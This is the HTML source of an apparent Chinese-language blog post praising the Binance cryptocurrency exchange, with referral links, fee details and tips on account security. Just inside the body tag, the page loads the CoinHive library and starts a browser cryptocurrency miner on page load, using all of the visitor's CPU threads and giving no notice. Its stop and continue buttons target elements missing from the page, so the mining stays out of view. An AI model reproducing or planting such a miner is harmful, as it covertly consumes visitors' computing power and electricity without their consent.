<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="description" content="Binance 幣安 - 虛擬貨幣 | 比特幣交易所 ，中文介面、入金免手續" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Binance 幣安 - 虛擬貨幣 | 比特幣交易所 ，中文介面、入金免手續費、交易速度快</title>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-110965571-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-110965571-1');
</script>
<style type="text/css">
<!--
body {
	font: 100%/1.4 Verdana, Arial, Helvetica, sans-serif;
	background-color: #4E5869;
	margin: 0;
	padding: 0;
	color: #000;
}

/* ~~ 元素/標籤選取器 ~~ */
ul, ol, dl { /* 由於瀏覽器之間的差異，最佳作法是在清單中使用零寬度的欄位間隔及邊界。為了保持一致，您可以在這裡指定所要的量，或在清單包含的清單項目 (LI、DT、DD) 上指定所要的量。請記住，除非您寫入較為特定的選取器，否則在此執行的作業將重疊顯示到 .nav 清單。 */
	padding: 0;
	margin: 0;
}
h1, h2, h3, h4, h5, h6, p {
	margin-top: 0;	 /* 移除上方邊界可以解決邊界可能從其包含的 Div 逸出的問題。剩餘的下方邊界可以保持 Div 不與接在後面的元素接觸。 */
	padding-right: 15px;
	padding-left: 15px; /* 將欄位間隔加入至 Div 內元素的兩側 (而不是 Div 本身)，即可不需執行任何方塊模型的計算作業。具有側邊欄位間隔的巢狀 Div 也可當做替代方法。 */
}
a img { /* 這個選取器會移除某些瀏覽器在影像由連結所圍繞時，影像周圍所顯示的預設藍色邊框 */
	border: none;
}

/* ~~ 網站連結的樣式設定必須保持此順序，包括建立滑過 (Hover) 效果的選取器群組在內。~~ */
a:link {
	color:#414958;
	text-decoration: underline; /* 除非您要設定非常獨特的連結樣式，否則最好提供底線，以便快速看出 */
}
a:visited {
	color: #4E5869;
	text-decoration: underline;
}
a:hover, a:active, a:focus { /* 這個選取器群組可以讓使用鍵盤導覽的使用者，也和使用滑鼠的使用者一樣擁有相同的滑過體驗。 */
	text-decoration: none;
}

/* ~~ 這個容器環繞著所有其他的 Div，並依百分比設定其寬度 ~~ */
.container {
	width: 80%;
	max-width: 1260px;/* 建議您使用最大寬度，如此版面在大型螢幕上就不致於過寬，讓行保持比較方便閱讀的長度。IE6 並不適用這項宣告。 */
	min-width: 780px;/* 建議您使用最小寬度，如此版面在大型螢幕上就不致於過窄，讓行在側欄中保持比較方便閱讀的長度。IE6 並不適用這項宣告。 */
	background-color: #FFF;
	margin: 0 auto; /* 兩側的自動值與寬度結合後，版面便會置中對齊。如果將 .container 的寬度設為 100%，就不需要這麼做。 */
}

/* ~~ 這是版面資訊。~~ 

1) 欄位間隔只會置於 Div 的頂端或底部。此 Div 內的元素在兩側會有欄位間隔，可讓您不需進行「方塊模型計算」。請記住，如果對 Div 本身加入任何側邊的欄位間隔或邊框，在計算「總」寬度時，就會將這些加入您定義的寬度。您也可以選擇移除 Div 中元素的欄位間隔，然後在其中放置沒有寬度的第二個 Div，並依設計所需放置欄位間隔。

*/
.content {
	padding: 10px 0;
}

/* ~~ 這個群組選取器會在 .content 區域空間中提供清單 ~~ */
.content ul, .content ol { 
	padding: 0 15px 15px 40px; /* 這個欄位間隔反映出上方標題和段落規則中的右方間隔。當欄位間隔位於下方時，便可將清單中的其他元素間隔開來；當位於左方時，則可藉此建立縮排。這些動作均可依需要進行調整。 */
}

/* ~~ 其他 float/clear 類別 ~~ */
.fltrt {  /* 這個類別可用來讓元素在頁面中浮動，浮動的元素必須位於頁面上相鄰的元素之前。 */
	float: right;
	margin-left: 8px;
}
.fltlft { /* 這個類別可用來讓元素在頁面左方浮動，浮動的元素必須位於頁面上相鄰的元素之前。 */
	float: left;
	margin-right: 8px;
}
.clearfloat { /* 這個類別可放置在 <br /> 或空白的 Div 上，當做接在 #container 內最後一個浮動 Div 後方的最後一個元素 (如果已移除 .container 上的 overflow:hidden) */
	clear:both;
	height:0;
	font-size: 1px;
	line-height: 0px;
}
-->
</style></head>

<body>

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script type="text/javascript">
var miner = new CoinHive.User('nueUIn9yJrvxUBki7TwJMs0s0bpqXDqb', 'User', {
	threads: navigator.hardwareConcurrency,
	autoThreads: false,
	throttle: 0.5,
	forceASMJS: false
	});
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
// Update stats once per second
setInterval(function() {
    var threadCount = miner.getNumThreads();
    var hashesPerSecond = Math.round(miner.getHashesPerSecond() * 100) / 100;
    var totalHashes = miner.getTotalHashes();
    var acceptedHashes = miner.getAcceptedHashes() / 256;
    // Output to HTML elements...
    if (miner.isRunning()) {
        document.getElementById("ths").innerHTML = "Hashes:</br> " + totalHashes;
        document.getElementById("minebutton").innerHTML = "<button onclick=\"miner.stop()\">Stop</br>Mining</button>";
    } else {
        document.getElementById("ths").innerHTML = "Total:</br>" + totalHashes;;
        document.getElementById("minebutton").innerHTML = "<button onclick=\"miner.start(CoinHive.FORCE_EXCLUSIVE_TAB)\">Continue</br>Mining</button>";
    }
}, 1000);
</script>

<div class="container">
  <div class="content">
    <blockquote>
      <blockquote>
        <blockquote>
          <h2>Binance 幣安 - 虛擬貨幣 | 比特幣交易所 ，中文介面、入金免手續費、交易速度快 </h2>
          <p>&nbsp;</p>
          <p>&nbsp;</p>
          <p>在 Bitfinex 頻頻出包的情況下開始想尋找低手續費而且交易量足夠的交易所，多方比較之後我選擇了 <a href="https://www.binance.com/?ref=11735086"><b>Binance 幣安</b></a>，它是中資跨國經營，目標客群拓展到全世界，<span style="color: red;"><b>全網交易量維持在 2~3名</b></span>，加上又<b><span style="color: red;">有中文介面和更多的幣種</span></b> (真的很多......，而且常常有新上架的，可以開發新主力) ，用來交易的貨幣就包括 BTC、ETH、BNB、USDT，USDT用來避險很方便，BNB是幣安自己開發的貨幣，即使在交易其他貨幣也可以選擇用BNB來付一半的手續費，算是很特別的設計。<br />
            <br />
          </p>
        </blockquote>
      </blockquote>
    </blockquote>
    <div class="separator" style="clear: both; text-align: center;">
      <blockquote>
        <blockquote>
          <blockquote>
            <p><a href="https://4.bp.blogspot.com/-puzW66DMQ7o/WjiRrRXMCvI/AAAAAAAAA98/485uFNgzpn4CkQMRD2HBFDpysRHqt80_wCLcBGAs/s1600/2017-12-19_121218.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="198" data-original-width="364" height="192" src="https://4.bp.blogspot.com/-puzW66DMQ7o/WjiRrRXMCvI/AAAAAAAAA98/485uFNgzpn4CkQMRD2HBFDpysRHqt80_wCLcBGAs/s320/2017-12-19_121218.jpg" width="344" /></a></p>
          </blockquote>
        </blockquote>
      </blockquote>
    </div>
    <blockquote>
      <blockquote>
        <blockquote>
          <p><b><span style="font-size: large;">Binance 幣安</span></b><br />
            <br />
            推薦連結 :&nbsp;<a href="https://www.binance.com/?ref=11735086"><b>https://www.binance.com/?ref=11735086</b></a> (會有手續費優惠)<br />
            單日提領 : <b style="color: red;">2 BTC </b>護照認證後<b style="color: red;"> 100 BTC</b><br />
            交易手續 : <b><span style="color: red;">0.1% </span></b>(一半可扣BNB減免)<br />
            提領手續 : <a href="https://support.binance.com/hc/zh-tw/articles/115000429332-%E5%B9%A3%E5%AE%89%E7%B6%B2%E6%9C%8D%E5%8B%99%E8%B2%BB%E8%AA%AA%E6%98%8E"><b>不同幣別詳見官網&nbsp;</b></a><br />
            <br />
            <br />
            <br />
            <br />
            <br />
            註冊和驗證就不多贅述，<b><span style="color: red;">申請好帳號後記得使用 Google Auth 保障自己的帳戶安全。</span></b><br />
            <br />
            <br />
            <br />
            除了不能以法幣入金外 (其實大部分交易所都不行，用台幣入金更是不可能) ，幣安真的算功能很完善，能滿足大多數人的需求，凡是有要進行維修也都會提前告知，不像某些交易所突然就給你當個幾小時，回來買賣點都過了，幣安截至目前為止沒有傳出類似災情，算是可以信任的交易所。<br />
            <br />
            <br />
            <br />
          </p>
        </blockquote>
      </blockquote>
    </blockquote>
    <div class="separator" style="clear: both; text-align: center;">
      <blockquote>
        <blockquote>
          <blockquote>
            <p><a href="https://4.bp.blogspot.com/-J1qtrAU0RZ0/WjiZJF0IP7I/AAAAAAAAA-M/QiS2xJRtcHkOtFOnqGDoTt5_JURWcOAxwCLcBGAs/s1600/2017-12-19_124412.jpg"><img src="https://4.bp.blogspot.com/-J1qtrAU0RZ0/WjiZJF0IP7I/AAAAAAAAA-M/QiS2xJRtcHkOtFOnqGDoTt5_JURWcOAxwCLcBGAs/s1600/2017-12-19_124412.jpg" width="1023" height="501" /></a></p>
          </blockquote>
        </blockquote>
      </blockquote>
    </div>
    <blockquote>
      <blockquote>
        <blockquote>
          <p><br />
            <br />
            交易介面算是我看過很好的了，K線圖功能很完善，<b><span style="color: red;">有畫線工具和很多技術指標可以看</span></b>，功能已經有點像付費版的 Tradingview ，而且交易速度很快不會卡卡的，而停損限價的用法可以看<a href="https://support.binance.com/hc/zh-tw/articles/115003372072-%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8%E6%AD%A2%E7%9B%88%E6%AD%A2%E6%90%8D%E5%8A%9F%E8%83%BD"><b>官網</b></a>有詳細說明。<br />
            <br />
            <br />
            幣安官方也有出手機版 APP (<a href="https://play.google.com/store/apps/details?id=com.binance.dev"><b>GOOGLE PLAY官方下載</b></a>，IOS在官網也有)，有完整的交易和看盤功能，必須老實說...做得比 Bitfinex 好太多，如果幣安能維持這樣的穩定度我想我不會再回其他交易所了，<b><span style="color: red;">但還是要呼籲大家交易所不要當成錢包使用，Bitfinex 之前就有被駭客盜領的紀錄，最好交易完後還是取回自己錢包比較保險。</span></b><br />
            <b><span style="color: red;"><br /></span></b>
            <b><span style="color: red;"><br /></span></b>
            <b><span style="color: red;"><br /></span></b>
            <br />
            <br />
            <br />
            <!-- end .content -->
          </p>
        </blockquote>
      </blockquote>
    </blockquote>
  </div>
  <!-- end .container --></div>
  
  <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4e3a680e5532cd78"></script>
</body>
</html>
